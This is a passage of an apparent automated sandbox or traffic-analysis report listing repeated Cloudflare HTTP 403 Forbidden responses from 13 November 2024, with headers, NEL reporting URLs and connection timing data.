cfL4;desc="?proto=TCP&rtt=141215&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=20516&cwnd=32&unsent_bytes=0&cid=65f56815b85c26a3&ts=708&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWgU9G4AQi5q94uNvw%2B4XK6ZJcqBKf1jI4j0AkqRA%2BXM8l1rM8ac7lpNzGhbJ91oSf2QcVmjN98KNw4OqeqT%2Fejp%2FTwQfdyoseRUwndK2eyUd7c5GArcFIjQfSpgcpcG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072daeebfe37e-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=167898&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=17512&cwnd=32&unsent_bytes=0&cid=e31ee755400a3862&ts=596&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILsKwzIq6gbDJ4%2F66sgrnxje5FIUfgW1W%2BWB8IcNF%2BiKXLMAdgDE20dGWKMfQWyMH%2FCZqP8%2B%2Bc4AVU3IPEucSHvLO5bzgobpS0wPjJqZp2QMR4JtMOz%2BxCQcUzAMepWH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072e3fc62d79c-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=146570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20332&cwnd=32&unsent_bytes=0&cid=8b622a9829de32b7&ts=501&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KNz%2BwL5jt40WawpRVcr9nBci4YrOidndGEDRCzAEro1FUvYqV49pG5P2qf4v3eSgypbVebFdPnjs3LVTKAYi6K2Ynmk02zVeRYUbB%2BBO3FxErv1ToDJHh4rO%2BO2g7maZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072edc9a37374-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=129834&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=22287&cwnd=32&unsent_bytes=0&cid=1740d836c5f71e5f&ts=776&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pswzgrdyDrsJIPX3dZ2LvrTG8xG8knbsZ5QD6m3x0cQaJM7PwZ2%2FOjnecOo1zx1BDqJGO%2BZOXy4ltUSCnbBEKY57071ar49gvf%2F3G7PXUj%2FDgTugD09g96w%2FR%2FHxJv8P"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072f85989e36b-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=139980&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20059&cwnd=32&unsent_bytes=0&cid=e33bb2b48837105f&ts=505&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjae4mD%2BxOGAyipArYHkptJw9h%2FLNTpN88F791NgZ6QQ2ADVt%2BsjgaVXTcdMhrwRwYu3351lvFnGBYxWx9H%2BBqcxcOn5sSTjV7tOIrDk3SBBKpH%2BzdU9S5CUjF9wXRUG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20730148dcd768-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=156589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=18186&cwnd=32&unsent_bytes=0&cid=137fed4dc9920c19&ts=575&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2BJmJxP6Ps0agBrkSyQyry0%2F89gwUBxy3%2FI7dtX1kFSohIGH5r9QnfjOYbXNKKORvGnhgQhjjq%2FgbgEmAAJgE89H3kjREZTi0PJT7hf2yH4IXhKgThxt2oDhwZ3r5rpf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207308fd042c87-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1340&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2154761&cwnd=228&unsent_bytes=0&cid=9241388e304601e6&ts=394&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GT21G0dGeeA0ByYvdUGiiYKVcqVQ8kfwIikzxsJy8UANjF6ZlDVtTWnOgs84m%2F8LKvWvgYk%2FkETiHhtnlJA6kOzEeNRloLBilIX5QEEmB6nwikz3K1g64qzxWe4OdTSr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073107dcbc971-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=39825&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=72679&cwnd=32&unsent_bytes=0&cid=03bb5b8cf26572a9&ts=486&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSOXVeC52kxi%2FRdy5quxEBnPOcwY2%2BiwczSgXYxF0GnIwMaqPDUsarstAnApM51Oyl%2F7Ngo%2BBfbPjcOeN8%2Fp1d%2BsHWkEFsaS5J4VXSsTSOkHLpjtswmfDsvZgaUGttnU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207318bfd8d788-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=134927&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21447&cwnd=32&unsent_bytes=0&cid=286837213be96280&ts=968&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yQGNoPJj4b6FfOmS%2BYwm1LNKHnm6JlviO4g3wRHlASmckX7NPt%2FA%2BVt4QjfeL24KVZbzwsRU8N4%2BgzwqR9DUIyYhdc%2BoetczZuqiNtLbdg%2FAHEC68rQDWjlY4ktlHmZc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20732468f9d78b-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21075&cwnd=32&unsent_bytes=0&cid=73ddc33a4c9826a8&ts=553&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h492SEKam0kHZsn9UuyKimtDKEKIP36gJCpHdbdJxynH2DJf%2FGr%2BU7bbaqEayy%2Fs44XC4jEDRVPHYp6%2FpCN3Y4WZMzQbBWhQ%2FVo9O1wkmSmFgYbeUdYX7npLSQ3xJBeW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20732dcc24f675-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=138745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18395&cwnd=32&unsent_bytes=0&cid=28bb09f686d417be&ts=553&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UgOy7b8h9ZPo%2BOPQ9nXPf2tUt8QWHOYqWaHtpM2DervZ9RJNJLPG43P07W1FB7n683mGTThlhTjYOHHs%2BHGyDuhpp6c%2B4xr74XXiKOL1NaAXJbaKfaJKBf2jx6SpCLGL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207336ffe1d74b-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=131061&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22098&cwnd=32&unsent_bytes=0&cid=4501c5613c3f94c9&ts=615&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WCZI4zr%2FOT5u9EnGAYUPHs%2BuvBjmDNi0bwxRw2WS8t0i37k04eRVN%2FLwKWX8VMOEJm2E8C8X%2FAU%2BtwvrFxlHtvruMZbP4frLcp5JZUjoAvNTPH8KJQVvsZmq4Iwl162"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20733fbb226bc8-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=981&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2861660&cwnd=235&unsent_bytes=0&cid=7f679857cbd07a7a&ts=417&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=whIsG8DA0uyqXXPGqgI0f6E9Knl38Mk9pax1SjHnVCAGboHXedOX227srRQY2iGR3rm9rMu1hGagWeWOvtkSBAwGBLsZFcV6lW915U%2FbYC7bWJQg7fxg9HcUKUj98Zgp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073484b78e3a5-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=138035&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=19439&cwnd=32&unsent_bytes=0&cid=f4bd36db14e8d446&ts=831&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBEY6aFdYysGtc1lexUwe2czszcmxSm1%2FTP7s%2FBLYIm%2BWT5qEqrzNtoxowUTerLdEM%2FB5wv9uohz2%2Bv5UNh6xWtEcj1vOCpQWlwD5FApM2n%2F0owmU2rU1JPe7rcGbtcE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207356af3fd759-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=136593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22040&cwnd=32&unsent_bytes=0&cid=9e4a5e3dffdcdc74&ts=878&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fk2HRn2bSb%2BRwUO026S3Ca6xUM8Br8CcFECYvSAidACVK8OoHHGPSQGlefY7cacTaDlUHG%2F50YfW2Ti19WsohTGJYG5KEXvxGN%2BRt4dGIDCC%2BwPpJVOmKDCYAKrn9q14"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20735fbb56a918-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2228&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=1294590&cwnd=177&unsent_bytes=0&cid=38110786e51e7e48&ts=397&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fqHhDDa9vWu2f6ggicUok6Ays%2BQpWh0csmu8pwtkKHF70LwAp9GKoBjEThnFbUpkXpTPnJjQSbX8ub1SsYVxrvoiGx6JrUbYX5qJUobe3ra9ST39Sqo%2BwFL2WAoHhS%2BN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073689b8bd743-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=134490&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22078&cwnd=32&unsent_bytes=0&cid=58b9efb659a76c0e&ts=603&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BM2cNwwzt3Olr2SsX%2Br4bdl8Z1yxN%2FvFE%2FJuOoz04mQIKvdI9HOcWzZ7pfNk7tRvajTqlxWR%2BWaZKxDlBD9iSZeSjuGA3m3vbQLKzRQJVd0C47ab2ls1RaOoyvjT%2Beg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073709a56ce68-SJCalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=41658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=69520&cwnd=32&unsent_bytes=0&cid=9a1a4e3ed90fbf59&ts=549&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT%2FWTzb%2BFOnNfpD53mNEyzH2Uj2zL43XDudcNIF019IfZz3KUKD6RMI%2BIBtcCoSSRrxSADQUm%2FdcRO05SJeR8s4mtIZyoSq2uy%2FdSWXDOP3bb1lr5zqDUyvhBEHgXx2a"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207379dbf7687f-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=151871&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=20624&cwnd=32&unsent_bytes=0&cid=610d245fe586dbef&ts=798&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKUvBUaO%2BtY9Pf%2Bcuumq09WIFjp2c2o33hdYmurBZn2K99YOOBfQIXzqE9tCggIndJWGZiTjY%2BI6vhCcpq4ICWi1RHfXu%2FVjzdUZ6nVNUwUZdbtNL92rkQXhaiYDDaNv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073857fe2f5a3-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=152051&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=19850&cwnd=32&unsent_bytes=0&cid=ed0e900ea97c8292&ts=732&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LgWNhYSaoyJOWiPDTGA5g%2F7ZrrfZX4iDwuulk7M07xt0bTCEVgjxjsL%2FvVBIWY%2FZ0Kck%2FU7V9AF4uhNd99TZ92nkJgraZJG4dVQh%2F4dDwdyIOKTMOxL7YX0D%2BdSaBVRL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20738d7d266c0d-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1308&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=25c9c3ee4ded2a4e&ts=422&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrwjC4qddBdn9lmfRTEMi525y39evnF0SOvFzbYHIAajVi8niqOXj6EwR%2F%2FQcWrhRn4M3L3td%2FKCPI%2B7lLglzIRCvI4X4TexZgi6ADx46Ox8PUNA8bnyIoPiK5ao%2FeWS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073961ab0795e-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=142635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20311&cwnd=32&unsent_bytes=0&cid=e149ad309aa58f3d&ts=744&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqMvV1Xx4MdMXw%2FU06YO3ZRXAUKVdAdI4g9quOnQhsOwf1UdbLWvLLK3lwBTC29%2FUjL6CaPjeTLRje4MxIQ07sTKoW%2BYWefhp1NiBxd5mtVEq1Hpx87TL6xKhrPSbDbn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073a01c227346-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22263&cwnd=32&unsent_bytes=0&cid=e26b5a25835c5e92&ts=783&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xAl5KbUg4duCxs8%2FGiy1oqHjkB4Jzqwv7GEtknhFs8FEKmdncIp3fysdL2r%2BRm2lzdVN8%2BxGTmkOiVnA8UKo%2BQXmTNmRQQZd%2BKfQ0wVDNCLeq8fOml%2BinkPHFVILZ4da"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073a8d8086b27-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1141&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2592658&cwnd=249&unsent_bytes=0&cid=cc97e5480558a86b&ts=464&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wcpvqb%2B9Ciq85jJZe3uw%2F1n0c8Ow0Wlk6izM0ey5IDLfNm%2BtN0Mxcd1DwjWu3kDkG2v%2BW0tlHqgbQJ4koeWCoY%2FKO3aNrXRr%2Fg8lBlGCUVb90qC2HY9euM6W%2B0W5aFB4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073b14fd86879-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=135700&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21335&cwnd=32&unsent_bytes=0&cid=25dfbc323f69631a&ts=785&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVmTE6zhwtZ7xpN7DSa5mKLD4zOVhUdVy1Pggz3lXJQv9ScAn6TtSF9PgD5l82zP8udsHBCXy2xs%2BtDMcLc4Rq0GJ79UI7euTUuITHdbrKNmVZFR6QfRFkktoAWz3Jwz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073bc6b1ad78b-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=135673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=20600&cwnd=32&unsent_bytes=0&cid=e24d933cc66df834&ts=506&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2BvFuXqEt%2FXb6WqxKfA8h%2FFhirw84zY0xUgHMXVA04aPRbKDYZHi0GyLOJdog2z1nqO6YEG05T8EIlXDjw4t6OL3rP1BCfG%2BMIDk9qS4zJD9X4tBkQQLUodINOTa9jTj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073c52d517368-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=135254&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=18139&cwnd=32&unsent_bytes=0&cid=94a472d9aea34c11&ts=564&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JMYgdLoiX0qP5bYgaVFC91CmiaK0KH6n%2BOFTwmvgV6tKFNE5nxIUbUvMV0b%2Ffiq6M%2FZcrslMMo6k3ASARwtBHv28TKMr0DBk0eQ%2Boq8OdhdpAQQ2SETT%2BQSYGsyppZlN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073cc8e5e2e25-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1728955&cwnd=251&unsent_bytes=0&cid=311b3fcb1717a73b&ts=405&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thQ1X9%2Bnk11UoQuKmKffgs6LnSXYQBUJbWNJWUtPF2FaeJ1Q2yt9Ot4Gr1NNjQ%2BWW3qbKUEVcIjLa3tPUIOqS0ButxqkoY2zLJ9yOwmrLiTD5gw48%2B25O2rkrFzkd0Hc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073d4ca7dd78b-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=131116&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=22074&cwnd=32&unsent_bytes=0&cid=0be484981a27ec58&ts=534&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nLAydMiW6wq5NX7VyHHxwXVR954BZZN19pr%2Fc73sBI%2Fooac%2Bw2zIH3%2BxnqtVYZwusvyxUn%2BOHt%2B8y%2BeGmPyUSYgMcdHgjhKb4Uwkm2gIIQ%2BFLEXQCIyZ0yhKpxQLJafs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073dc8feb2c92-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2077474&cwnd=241&unsent_bytes=0&cid=710d166ca75f1c1a&ts=531&x=0"
